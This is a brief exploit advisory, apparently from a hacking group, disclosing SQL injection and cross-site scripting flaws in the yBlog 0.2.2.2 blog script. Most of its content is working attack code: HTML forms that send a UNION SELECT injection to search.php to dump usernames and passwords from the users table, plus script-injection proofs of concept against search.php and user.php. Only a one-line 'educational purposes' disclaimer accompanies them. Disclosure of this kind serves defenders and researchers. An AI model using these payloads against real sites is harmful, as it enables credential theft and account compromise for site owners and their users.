/ | || | _ \| _ | _ | |
| (| _ | [)/| () | () | | |
\_____|| ||| ||||| ||
C. H. R. O. O. T. SECURITY GROUP
- – ----- — – – ---- — – -
http://www.chroot.org
_ _ _ _____ ____ ____ __ _
Hacks In Taiwan | |_| | |_ _| __| | \| |
Conference 2008 | _ | | | | | (__| () | |
|_| |_|_| |_| \____|____|_|\__|
http://www.hitcon.org
Title =======:: yBlog 0.2.2.2 Multiple Remote Vulnerabilities
Author ======:: unohope [at] chroot [dot] org
IRC =========:: irc.chroot.org #chroot
ScriptName ==:: yBlog
Download ====:: http://nchc.dl.sourceforge.net/sourceforge/y-blog/yblog-0.2.2.2.tar.gz
Mirror ======:: http://www.badongo.com/file/9705849
[SQL Injection]
<form action="http://localhost/yblog/search.php" method="post">
<input type="hidden" name="q" value="' union select 0,1,2,3,usuario,5,6,7,8,9,10,password,12,13,14,15,16 from usuarios/*">
<input type="submit" value="send">
</form>
<form action="http://localhost/yblog/search.php" method="post">
<input type="hidden" name="cn" value="1">
<input type="hidden" name="q" value="' union select 0,1,2,3,usuario,5,6,7,8,9,10,password,12,13,14,15,16 from usuarios/*">
<input type="submit" value="send">
</form>
[Cross-Site Scripting]
<form action="http://localhost/yblog/search.php" method="post">
<input type="hidden" name="q" value="<script>alert(/xss/)</script>">
<input type="submit" value="send">
</form>
http://localhost/yblog/user.php?n=<script>alert(/xss/)</script>
[NOTE]
!! This is just for educational purposes, DO NOT use for illegal. !!